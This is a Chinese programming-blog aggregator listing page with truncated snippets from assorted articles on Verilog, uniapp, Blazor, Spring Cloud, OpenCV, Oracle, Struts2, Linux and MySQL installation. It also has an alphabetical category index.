  • [读书日志]8051软核处理器设计实战(基于FPGA)第六篇:8051软核处理器指令支持添加(verilog) JoneMaster JM读书日志系列fpga开发
    5.4为主体程序添加指令接下来我们来为主体程序添加指令。在开始之前,我们有必要先把目前的代码展示出来://`defineTYPE8052moduler8051(inputwireclk,inputwirerst,inputwirecpu_en,inputwirecpu_restart,outputregrom_en,outputreg[15:0]rom_addr,inputwire[7:0]rom
  • uniapp APP端页面触发调用uniapp开发的webview里的方法 printf_824 uniapp分享uni-app
    原理:使用getCurrentInstance()获取当前组件的Vue实例,通过instance.proxy.$scope.$getAppWebview()获取Uniapp的原生WebView对象。使用WebView提供的evalJS方法,执行嵌入H5页面内的JavaScript代码functiongetData(){url.value="http://192.168.0.22:5174/#/pa
  • 计算机组成原理(计算机系统3)--实验八:处理器结构拓展实验 起床悠悠 计算机系统java数据库前端嵌入式硬件
    一、实验目标:了解MIPS的五级流水线,和在运行过程中的所产生的各种不同的流水线冒险;通过指令顺序调整,或旁路与预测技术来提高流水线效率;更加了解流水线细节和其指令的改善方法;更加深入了解动态分支预测和BTB更加熟悉MIPS指令的使用。二、实验内容处理器结构实验一的扩展:用perf记录x86中的数据相关于指令序列调整前后的事件统计(stall、CPUcycles等)处理器结构实验二的扩展:在x86
  • 探索数据之美:Blazor-ApexCharts——为.NET Core而生的图表神器 解雁淞
    探索数据之美:Blazor-ApexCharts——为.NETCore而生的图表神器Blazor-ApexChartsAblazorwrapperforApexCharts.js项目地址:https://gitcode.com/gh_mirrors/bl/Blazor-ApexCharts在可视化日益重要的今天,找到一个既高效又灵活的图表库对于开发者来说至关重要。今天,我们要向大家隆重推荐一款专为
  • Blazor-ApexCharts 开源项目指南 凌桃莺Talia
    Blazor-ApexCharts开源项目指南项目地址:https://gitcode.com/gh_mirrors/bl/Blazor-ApexCharts一、项目介绍Blazor-ApexCharts是一个用于Blazor框架的图表组件库封装,它基于流行的前端图表库ApexCharts.js实现。这个项目旨在简化在Blazor应用中添加交互式图表的过程,无需直接处理复杂的JavaScript互
  • Information On Installed Database Components and Schemas cmkcnufwy33419835 数据库java
    Subject:InformationOnInstalledDatabaseComponentsandSchemasDocID:472937.1Type:HOWTOModifiedDate:20-JUL-2009Status:PUBLISHEDInthisDocumentGoalSolution1.JServerJAVAVirtualMachine2.OLAPCatalog,OLAPAnalyti
  • SpringCloud之OpenFeign简单使用 tuoerke springcloud
    SpringCloud之OpenFeign简单使用文章目录SpringCloud之OpenFeign简单使用一、远程调用功能使用url形式的方式测试二、负载功能测试三、熔断降级OpenFeign是springcloud在Feign的基础上支持了SpringMVC的注解,如@RequestMapping等等。OpenFeign的@FeignClient可以解析SpringMVC的@RequestMa
  • OpenCV 笔记(25):图像的仿射变换 Java与Android技术栈 opencv笔记人工智能计算机视觉
    1.几何变换图像的几何变换是指将一幅图像中的坐标位置映射到另一幅图像中的新坐标位置,其实质是改变像素的空间位置,估算新空间位置上的像素值。几何变换不改变图像的像素值,只是在图像平面上进行像素的重新安排。以下是常用的几种几何变换:旋转:将图像旋转指定角度。缩放:按缩放因子调整图像大小,使其变大或变小。平移:将图像从当前位置移动到新位置。错切:沿特定轴倾斜图像。仿射变换:一个更广泛的类别,包括单个变换
  • Logo语言的函数实现 萧澄华 包罗万象golang开发语言后端
    Logo语言的函数实现引言Logo语言是一种教育性编程语言,最初由西摩尔·派普特(SeymourPapert)在1960年代开发。它以“海龟图形”(TurtleGraphics)而闻名,通过简单的命令控制一只“海龟”在屏幕上绘制图形,从而帮助学生理解几何、编程及逻辑思维。Logo语言虽然简洁,但它的核心概念——特别是函数的实现与使用——为编程教育奠定了坚实的基础。在本文中,我们将探讨Logo语言的
  • Perl语言的软件开发工具 Code侠客行 包罗万象golang开发语言后端
    Perl语言的软件开发工具引言Perl是一种功能强大且灵活的高级编程语言,自1987年由拉里·沃尔(LarryWall)创建以来,就广泛应用于文本处理、系统管理、网络编程、Web开发等多个领域。作为一种脚本语言,Perl以其简洁的语法和强大的正则表达式处理能力而受到开发者的青睐。在实际开发过程中,虽然没有像Java或Python那样广泛流行,但Perl也有着自己独特的生态系统,其中包括许多强大的开
  • scala的option和some 矮蛋蛋 编程scala
    原文地址: http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说,对象是一个比较自然、简单的入口点。在 本系列 前几期文章中,我介绍了 Scala 中一些面向对象的编程方法,这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念,找到其缺点
  • NullPointerException Cb123456 androidBaseAdapter
        java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference     出现以上异常.然后就在baidu上
  • PHP使用文件和目录 天子之骄 php文件和目录读取和写入php验证文件php锁定文件
    PHP使用文件和目录 1.使用include()包含文件 (1):使用include()从一个被包含文档返回一个值 (2):在控制结构中使用include()   include_once()函数需要一个包含文件的路径,此外,第一次调用它的情况和include()一样,如果在脚本执行中再次对同一个文件调用,那么这个文件不会再次包含。   在php.ini文件中设置
  • SQL SELECT DISTINCT 语句 何必如此 sql
    SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句 在表中,一个列可能会包含多个重复值,有时您也许希望仅仅列出不同(distinct)的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
  • java冒泡排序 3213213333332132 java冒泡排序
    package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
  • struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题! 7454103 DAOspringAjaxjsonqq
    struts2.18  出来有段时间了! (貌似是 稳定版)   闲时研究下下!  貌似 sruts2 搭配 json 做 ajax 很吃香!   实践了下下! 不当之处请绕过! 呵呵   网上一大堆 struts2+json  不过大多的json 插件 都是 jsonplugin.34.jar   strut
  • struts2 数据标签说明 darkranger jspbeanstrutsservletScheme
    数据标签主要用于提供各种数据访问相关的功能,包括显示一个Action里的属性,以及生成国际化输出等功能 数据标签主要包括: action :该标签用于在JSP页面中直接调用一个Action,通过指定executeResult参数,还可将该Action的处理结果包含到本页面来。 bean :该标签用于创建一个javabean实例。如果指定了id属性,则可以将创建的javabean实例放入Sta
  • 链表.简单的链表节点构建 aijuans 编程技巧
    /*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \  Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node {  &nbs
  • tomcat下jndi的三种配置方式 avords tomcat
    jndi(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来,使得我们可以用名称 访问对象。目录服务是一种命名服务,在这种服务里,对象不但有名称,还有属性。          tomcat配置
  • 关于敏捷的一些想法 houxinyou 敏捷
    从网上看到这样一句话:“敏捷开发的最重要目标就是:满足用户多变的需求,说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。 感觉容易被人误解的地方主要在“用户多变的需求”上。 第一种多变,实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的,只是比较多,也比较混乱,用户一般只能了解自己的那一小部分,所以没有用户能清楚的表达出整体需求。而由于各种条件的,用户表达自己那一部分时也有
  • 富养还是穷养,决定孩子的一生 bijian1013 教育人生
    是什么决定孩子未来物质能否丰盛?为什么说寒门很难出贵子,三代才能出贵族?真的是父母必须有钱,才能大概率保证孩子未来富有吗?-----作者:@李雪爱与自由 事实并非由物质决定,而是由心灵决定。一朋友富有而且修养气质很好,兄弟姐妹也都如此。她的童年时代,物质上大家都很贫乏,但妈妈总是保持生活中的美感,时不时给孩子们带回一些美好小玩意,从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
  • oracle 日期时间格式转化 征客丶 oracle
    oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP; SYSDATE:不支持毫秒,取的是系统时间; SYSTIMESTAMP:支持毫秒,日期,时间是给时区转换的,秒和毫秒是取的系统的。 日期转字符窜: 一、不取毫秒: TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明, YYYY 年 MM   月
  • 【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
    1. apply语法   FileShuffleBlockManager中定义的类ShuffleFileGroup,定义:   private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
  • Erlang中有意思的bug bookjovi erlang
      代码中常有一些很搞笑的bug,如下面的一行代码被调用两次(Erlang beam) commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
  • 移位打印10进制数转16进制-2008-08-18 ljy325 java基础
    /** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
  • 读《研磨设计模式》-代码笔记-组合模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
  • 利用cmd命令将.class文件打包成jar chenyu19891124 cmdjar
    cmd命令打jar是如下实现: 在运行里输入cmd,利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作: cd D: 回车 cd workspace/prpal
  • [原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse设计模式算法工作swing
                           JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明     &nb
  • SecureCRT右键粘贴的设置 daizj secureCRT右键粘贴
    一般都习惯鼠标右键自动粘贴的功能,对于SecureCRT6.7.5 ,这个功能也已经是默认配置了。 老版本的SecureCRT其实也有这个功能,只是不是默认设置,很多人不知道罢了。 菜单: Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
  • Linux 软链接和硬链接 dongwei_6688 linux
    1.Linux链接概念Linux链接分两种,一种被称为硬链接(Hard Link),另一种被称为符号链接(Symbolic Link)。默认情况下,ln命令产生硬链接。 【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中,保存在磁盘分区中的文件不管是什么类型都给它分配一个编号,称为索引节点号(Inode Index)。在Linux中,多个文件名指向同一索引节点是存在的。一般这种连
  • DIV底部自适应 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
    第1步、yum安装mysql [root@stonex ~]#  yum -y install mysql-server 安装结果: Installed:     mysql-server.x86_64 0:5.1.73-3.el6_5                   &nb
  • 如何调试JDK源码 frank1234 jdk
    相信各位小伙伴们跟我一样,想通过JDK源码来学习Java,比如collections包,java.util.concurrent包。 可惜的是sun提供的jdk并不能查看运行中的局部变量,需要重新编译一下rt.jar。 下面是编译jdk的具体步骤:         1.把C:\java\jdk1.6.0_26\sr
  • Maximal Rectangle hcx2013 max
    Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area.   public class Solution { public int maximalRectangle(char[][] matrix)
  • Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
    随着RESTful Web Service的流行,测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架,如果版本低于3.2,请使用spring-test-mvc项目(合并到spring3.2中了)。   Spring MVC测试框架提供了对服务器端和客户端(基于RestTemplate的客户端)提供了支持。 &nbs
  • Linux64位操作系统(CentOS6.6)上如何编译hadoop2.4.0 liyong0802 hadoop
    一、准备编译软件   1.在官网下载jdk1.7、maven3.2.1、ant1.9.4,解压设置好环境变量就可以用。     环境变量设置如下:   (1)执行vim /etc/profile (2)在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
  • StatusBar 字体白色 pangyulei status
    [[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
  • 如何分析Java虚拟机死锁 sesame javathreadoracle虚拟机jdbc
    英文资料: Thread Dump and Concurrency Locks   Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
  • 位运算简介及实用技巧(一):基础篇 tw_wangzhengquan 位运算
    http://www.matrix67.com/blog/archives/263    去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一,很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料,学习到了更多关于位运算的知识,有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章,与其说是原来那篇文章的follow-up,不如说是一个r
  • jsearch的索引文件结构 yangshangchuan 搜索引擎jsearch全文检索信息检索word分词
    jsearch是一个高性能的全文检索工具包,基于倒排索引,基于java8,类似于lucene,但更轻量级。   jsearch的索引文件结构定义如下:     1、一个词的索引由=分割的三部分组成:        第一部分是词        第二部分是这个词在多少
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他